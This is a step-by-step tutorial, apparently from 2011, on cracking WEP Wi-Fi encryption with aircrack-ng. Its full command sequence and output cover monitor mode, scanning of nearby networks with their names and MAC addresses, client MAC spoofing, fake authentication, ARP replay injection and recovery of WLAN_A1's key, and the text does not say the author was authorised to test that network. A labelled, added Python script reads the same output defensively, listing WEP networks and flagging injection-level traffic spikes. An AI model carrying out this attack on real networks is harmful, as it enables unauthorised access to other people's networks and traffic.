This tutorial assumes the following:
- Running on a system with a Bash interpreter (e.g. Linux)
- A wireless card that supports monitor mode and packet injection (e.g. Atheros chipset), working properly and with adequate drivers (this only matters on Windows)
- The Aircrack-ng suite (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng) installed and operational
The first thing we have to do is put our wireless card into monitor mode. This way we can capture 802.11 packets from other networks and also inject our own custom packets.
Stop any monitor interface left over from a previous session, then start a new one on wlan0; airmon-ng creates it as mon0:
$ sudo airmon-ng stop wlan0
Interface  Chipset  Driver
wlan0      Unknown  rt2800pci - [phy0]
(monitor mode disabled)
$ sudo airmon-ng start wlan0
Interface  Chipset  Driver
wlan0      Unknown  rt2800pci - [phy0]
(monitor mode enabled on mon0)
The new mon0 interface is now up:
$ ifconfig mon0
mon0 Link encap:UNSPEC HWaddr EC-55-F9-B5-96-50-00-00-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1937 errors:0 dropped:1937 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:262666 (262.6 KB) TX bytes:0 (0.0 B)
With the card in monitor mode, airodump-ng lists every access point and client within range:
$ sudo airodump-ng mon0
CH 11 ][ BAT: 1 hour 59 mins ][ Elapsed: 12 s ][ 2011-09-04 01:22
BSSID              PWR  Beacons  #Data,  #/s  CH  MB    ENC   CIPHER AUTH  ESSID
64:68:0C:8D:9C:23  -33       10       1    0  11  54e   WPA   CCMP   PSK   JAZZTEL_9C22
00:1A:2B:08:06:63  -70       11       0    0   3  54    WEP   WEP          WLAN_C2
00:1A:2B:5B:D8:34  -70        8       0    0  11  54    WEP   WEP          JAZZTEL_0C
00:24:17:18:40:FB  -78        9       0    0  11  54    WPA   TKIP   PSK   ORANGE-FB32FA
E8:39:DF:CF:D1:7E  -85        2       0    0   3  54e   WPA2  CCMP   PSK   Jazztel_A3
40:4A:03:9E:E4:D0  -83        6       0    0   4  54 .  WEP   WEP          WLAN_25
00:21:63:6B:DA:58  -84        7       0    0  11  54e   WPA   TKIP   PSK   VodafoneDA57
40:4A:03:BE:D6:A7  -84        7      58    0   9  54 .  WEP   WEP          WLAN_A1
00:1A:2B:13:98:1C  -83        9       0    0   3  54    WEP   WEP          WLAN_D7
E8:39:DF:CF:D1:7D  -84        5       0    0   3  54e   WPA2  CCMP   PSK   Jazztel
00:1D:6A:6C:F4:C3  -85        5       0    0   6  54e.  WPA2  CCMP   PSK   Orange-80f4
62:C7:14:33:18:5C  -86        6       0    0   7  54e   WPA   CCMP   PSK   vodafoneenrique01
88:25:2C:71:90:98  -86        8       0    0   6  54e.  WEP   WEP          nuria
00:13:49:89:27:7C  -87        8       0    0   9  54 .  WEP   WEP          WLAN_91
00:1A:2B:4A:6E:0E  -88        8       0    0  11  54    WEP   WEP          adsuar
00:22:2D:3E:8D:48  -89        8       0    0  11  54e.  WEP   WEP          lucy_david
E0:91:53:49:70:DA  -90        9       1    0  10  54 .  WEP   WEP          WLAN_78
00:23:08:E3:C5:34  -90        3       4    0   9  54e.  WEP   WEP          WLAN3C5903
5C:33:8E:E0:63:3A  -90        5       0    0   6  54e.  WPA2  CCMP   PSK   Reaviles_Madrid
50:67:F0:88:20:9C  -92        5       0    0   7  54 .  WEP   WEP          WLAN_0B
00:1A:2B:08:E4:BB  -93        0       0    0  11  54    WEP   WEP          galapagos
BSSID              STATION            PWR  Rate     Lost  Packets  Probes
(not associated)   40:28:49:55:A8:C2    0  0 - 1       0       11
64:68:0C:8D:9C:23  7C:61:93:E5:6B:5B  -40  0 - 5e      0        1
40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -70  0 -54     238       61  WLAN_A1
The --encrypt wep option restricts the listing to networks still using WEP:
$ sudo airodump-ng --encrypt wep mon0
CH 10 ][ BAT: 2 hours 2 mins ][ Elapsed: 24 s ][ 2011-09-04 01:23
BSSID              PWR  Beacons  #Data,  #/s  CH  MB    ENC   CIPHER AUTH  ESSID
00:1A:2B:5B:D8:34  -70       18       0    0  11  54    WEP   WEP          JAZZTEL_0C
00:1A:2B:08:06:63  -70       19       0    0   3  54    WEP   WEP          WLAN_C2
00:1A:2B:13:98:1C  -82       19       0    0   3  54    WEP   WEP          WLAN_D7
40:4A:03:9E:E4:D0  -84       17       0    0   4  54 .  WEP   WEP          WLAN_25
40:4A:03:BE:D6:A7  -84       16     182    0   9  54 .  WEP   WEP          WLAN_A1
00:13:49:89:27:7C  -87       13       0    0   9  54 .  WEP   WEP          WLAN_91
88:25:2C:71:90:98  -87       15       0    0   6  54e.  WEP   WEP          nuria
00:22:2D:3E:8D:48  -87       10       0    0  11  54e.  WEP   WEP          lucy_david
00:1A:2B:4A:6E:0E  -88       11       0    0  11  54    WEP   WEP          adsuar
00:23:08:E3:C5:34  -89        4       0    0   9  54e.  WEP   WEP          WLAN3C5903
E0:91:53:49:70:DA  -90        7       0    0  10  54 .  WEP   WEP          WLAN_78
64:68:0C:6C:9C:11  -92        2       0    0   6  54    WEP   WEP          Wireless Jazztel
50:67:F0:88:20:9C  -92        4       0    0   7  54 .  WEP   WEP          WLAN_0B
00:1A:2B:08:E4:BB  -93        6       0    0  11  54    WEP   WEP          galapagos
00:60:4C:98:61:89  -95        2       0    0   6  54 .  WEP   WEP          adsl4917
BSSID              STATION            PWR  Rate     Lost  Packets  Probes
40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -72  0 -54     240      181
Locking airodump-ng on channel 9 and on a single BSSID stops the channel hopping; the RXQ column now shows the receive quality for that access point:
$ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 mon0
CH 9 ][ BAT: 2 hours 3 mins ][ Elapsed: 8 s ][ 2011-09-04 01:27
BSSID              PWR  RXQ  Beacons  #Data,  #/s  CH  MB    ENC   CIPHER AUTH  ESSID
40:4A:03:BE:D6:A7  -88    6       74     475   44   9  54 .  WEP   WEP          WLAN_A1
BSSID              STATION            PWR  Rate     Lost  Packets  Probes
40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -70  0 -54      99      473
The same capture again, this time with --ivs, which stores only the initialization vectors, and -w WLAN_A1, which sets the output file prefix (the file becomes WLAN_A1-01.ivs):
$ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 --ivs -w WLAN_A1 mon0
CH 9 ][ BAT: 1 hour 57 mins ][ Elapsed: 8 s ][ 2011-09-04 01:30
BSSID              PWR  RXQ  Beacons  #Data,  #/s  CH  MB    ENC   CIPHER AUTH  ESSID
40:4A:03:BE:D6:A7  -88    7       91     519   47   9  54 .  WEP   WEP          WLAN_A1
BSSID              STATION            PWR  Rate     Lost  Packets  Probes
40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -70  0 -54      74      519
Next, a fake authentication with the access point, using (-h) the MAC address of the client that is already associated; aireplay-ng warns that this is not mon0's own MAC, but the association still succeeds:
$ sudo aireplay-ng --fakeauth 10 -a 40:4A:03:BE:D6:A7 -h E0:B9:A5:66:F7:9E mon0
The interface MAC (EC:55:F9:B5:96:50) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether E0:B9:A5:66:F7:9E
01:33:27 Waiting for beacon frame (BSSID: 40:4A:03:BE:D6:A7) on channel 9
01:33:27 Sending Authentication Request (Open System)
01:33:27 Authentication successful
01:33:27 Sending Association Request
01:33:27 Association successful :-) (AID: 1)
[ACK]
ARP request replay: aireplay-ng captures ARP requests and re-injects them, so the access point keeps answering with new WEP-encrypted frames, each carrying a fresh IV:
$ sudo aireplay-ng --arpreplay -h E0:B9:A5:66:F7:9E -b 40:4A:03:BE:D6:A7 mon0
The interface MAC (EC:55:F9:B5:96:50) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether E0:B9:A5:66:F7:9E
01:36:45 Waiting for beacon frame (BSSID: 40:4A:03:BE:D6:A7) on channel 9
Saving ARP requests in replay_arp-0904-013645.cap
You should also start airodump-ng to capture replies.
Read 5291 packets (got 1485 ARP requests and 229 ACKs), sent 2742 packets...(500 pps)
Meanwhile, in the airodump-ng window, #Data and #/s climb quickly (compare with 475 and 44 before the replay started):
CH 9 ][ BAT: 1 hour 9 mins ][ Elapsed: 8 mins ][ 2011-09-04 01:38
BSSID              PWR  RXQ  Beacons  #Data,  #/s  CH  MB    ENC   CIPHER AUTH  ESSID
40:4A:03:BE:D6:A7  -84   45     4072   34576  361   9  54 .  WEP   WEP    OPN   WLAN_A1
BSSID              STATION            PWR  Rate     Lost  Packets  Probes
40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E    0  24 - 1   8121    81946  WLAN_A1
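As an added example (not code from the original post or from the aircrack-ng project), the following Python script reads airodump-ng output the way a defender would: it parses the access-point rows from the listings above, lists the networks still on WEP or open (the ones exposed to the PTW attack shown in this tutorial), and compares two snapshots of the locked-channel view to flag the jump in data-frame rate (44/s to 361/s above) that ARP replay injection produces. The sample rows are copied from the listings in this post, except the two WLAN_C2 control rows, which are constructed; the rate thresholds are assumptions chosen for illustration, not values from any tool.

```python
"""Defender-side reading of airodump-ng output: a WEP inventory plus a check
for the traffic pattern a replay attack leaves behind.  Added example, not
code from the original post nor from the aircrack-ng suite."""
import re
from dataclasses import dataclass

# One access-point row of airodump-ng screen output.  RXQ only appears in the
# single-channel view, so it is optional.  MB may carry "e" (802.11g) and a "."
# flag that is sometimes space-separated ("54 ."), the AUTH column is blank
# until an authentication is observed, and the ESSID may contain spaces.
AP_ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-F]{2}:){5}[0-9A-F]{2})\s+"
    r"(?P<pwr>-?\d+)\s+(?:(?P<rxq>\d+)\s+)?(?P<beacons>\d+)\s+"
    r"(?P<data>\d+)\s+(?P<per_s>\d+)\s+(?P<ch>\d+)\s+"
    r"(?P<mb>\d+e?\.?(?: \.)?)\s+"
    r"(?P<enc>OPN|WEP|WPA2|WPA)\s+(?P<cipher>WEP104|WEP40|WEP|TKIP|CCMP)?\s*"
    r"(?P<auth>PSK|MGT|OPN|SKA)?\s*(?P<essid>.*?)\s*$"
)


@dataclass(frozen=True)
class AccessPoint:
    bssid: str
    power: int
    beacons: int
    data: int      # data frames seen; on a WEP network each carries one IV
    per_s: int     # recent data-frame rate (the #/s column)
    channel: int
    enc: str
    cipher: str
    auth: str
    essid: str


def parse_ap_rows(text: str) -> list:
    """Access-point rows of an airodump-ng screen dump; header, station and
    blank lines do not match the pattern and are skipped."""
    aps = []
    for line in text.splitlines():
        m = AP_ROW.match(line.strip())
        if m:
            aps.append(AccessPoint(
                bssid=m["bssid"], power=int(m["pwr"]),
                beacons=int(m["beacons"]), data=int(m["data"]),
                per_s=int(m["per_s"]), channel=int(m["ch"]), enc=m["enc"],
                cipher=m["cipher"] or "", auth=m["auth"] or "",
                essid=m["essid"]))
    return aps


def legacy_networks(aps) -> list:
    """Networks still on WEP or with no encryption: the ones the PTW attack in
    this tutorial applies to.  The remedy is migration to WPA2/WPA3; the key
    recovered above is already a 104-bit one, so a longer WEP key is no fix."""
    return sorted({ap.essid for ap in aps if ap.enc in ("WEP", "OPN")})


def injection_suspects(before, after, rate_factor=5, min_per_s=100) -> list:
    """Flag access points whose data-frame rate jumped far above its earlier
    baseline between two snapshots.  A WEP network idling at tens of frames
    per second that suddenly sustains hundreds is the pattern ARP replay
    injection produces and the one a wireless IDS alerts on.  rate_factor and
    min_per_s are illustrative thresholds (assumptions for this example).
    Returns (essid, bssid, old #/s, new #/s, data frames added)."""
    baseline = {ap.bssid: ap for ap in before}
    flagged = []
    for ap in after:
        old = baseline.get(ap.bssid)
        if old is not None and ap.per_s >= max(min_per_s, rate_factor * old.per_s):
            flagged.append((ap.essid, ap.bssid, old.per_s, ap.per_s,
                            ap.data - old.data))
    return flagged


# Rows copied from the survey listing earlier in this tutorial.
SURVEY = """\
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
64:68:0C:8D:9C:23 -33 10 1 0 11 54e WPA CCMP PSK JAZZTEL_9C22
00:1A:2B:08:06:63 -70 11 0 0 3 54 WEP WEP WLAN_C2
00:1A:2B:5B:D8:34 -70 8 0 0 11 54 WEP WEP JAZZTEL_0C
E8:39:DF:CF:D1:7E -85 2 0 0 3 54e WPA2 CCMP PSK Jazztel_A3
40:4A:03:BE:D6:A7 -84 7 58 0 9 54 . WEP WEP WLAN_A1
64:68:0C:6C:9C:11 -92 2 0 0 6 54 WEP WEP Wireless Jazztel
BSSID STATION PWR Rate Lost Packets Probes
40:4A:03:BE:D6:A7 E0:B9:A5:66:F7:9E -70 0 -54 238 61 WLAN_A1
"""

# Single-channel view (RXQ column) before and during the replay.  The WLAN_A1
# rows are copied from above; the WLAN_C2 rows are constructed as a quiet control.
BEFORE = """\
40:4A:03:BE:D6:A7 -88 6 74 475 44 9 54 . WEP WEP WLAN_A1
00:1A:2B:08:06:63 -70 3 19 0 0 3 54 WEP WEP WLAN_C2
"""
AFTER = """\
40:4A:03:BE:D6:A7 -84 45 4072 34576 361 9 54 . WEP WEP OPN WLAN_A1
00:1A:2B:08:06:63 -70 4 21 1 0 3 54 WEP WEP WLAN_C2
"""

if __name__ == "__main__":
    print("Legacy networks:", legacy_networks(parse_ap_rows(SURVEY)))
    for essid, bssid, old, new, frames in injection_suspects(
            parse_ap_rows(BEFORE), parse_ap_rows(AFTER)):
        print(f"ALERT {essid} ({bssid}): {old} -> {new} data frames/s, "
              f"+{frames} frames since last snapshot")
```

Run as-is it prints the four WEP networks from the sample survey and one alert for WLAN_A1; the quiet WLAN_C2 control is not flagged. The parser keys on the fixed ENC keyword so that the variable MB and blank AUTH columns do not shift the ESSID, and it accepts both the hopping view and the RXQ view of the same table.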
Finally, aircrack-ng runs the PTW attack on the captured IVs (-c restricts the key search to alphanumeric characters):
$ aircrack-ng -c WLAN_A1-01.ivs
Opening WLAN_A1-01.ivs
Read 51527 packets.
# BSSID ESSID Encryption
1 40:4A:03:BE:D6:A7 WLAN_A1 WEP (51526 IVs)
Choosing first network as target.
Opening WLAN_A1-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 51738 ivs.
Aircrack-ng 1.1 r1904
[00:00:00] Tested 37 keys (got 30056 IVs)
KB depth byte(vote)
0 0/ 2 5A(42752) 7D(36608) 9E(36608) E6(36608) ED(36352) 64(36096) 7F(36096) 0B(35840) 3F(35584) 89(35584) 66(35072) 6D(35072) 2F(34816)
1 7/ 8 6B(36352) 62(35584) 03(35328) 29(35328) 70(35072) 7A(34816) A2(34816) A7(34816) 0D(34560) 32(34560) 8C(34560) 1E(34304) CA(34304)
2 3/ 2 8D(36096) 33(35840) 90(35840) 1C(35072) 2D(35072) BB(35072) FF(35072) 0C(34816) 53(34816) D0(34816) 9C(34560) AB(34560) 23(34304)
3 4/ 3 C0(36864) A2(35840) AF(35840) 30(35584) 36(35584) 31(35328) 79(35072) 2A(34816) 2D(34560) 55(34560) 14(34304) 4F(34304) FA(34304)
4 0/ 2 33(45568) 69(39680) E3(36096) 0E(35328) 13(35328) 23(35328) 80(35328) B4(35328) E4(35328) 92(35072) 9C(35072) 0F(34816) 87(34816)
KEY FOUND! [ 5A:34:30:34:41:30:33:43:35:30:45:41:31 ] (ASCII: Z404A03C50EA1 )
Decrypted correctly: 100%
Hope this was useful for you, see you!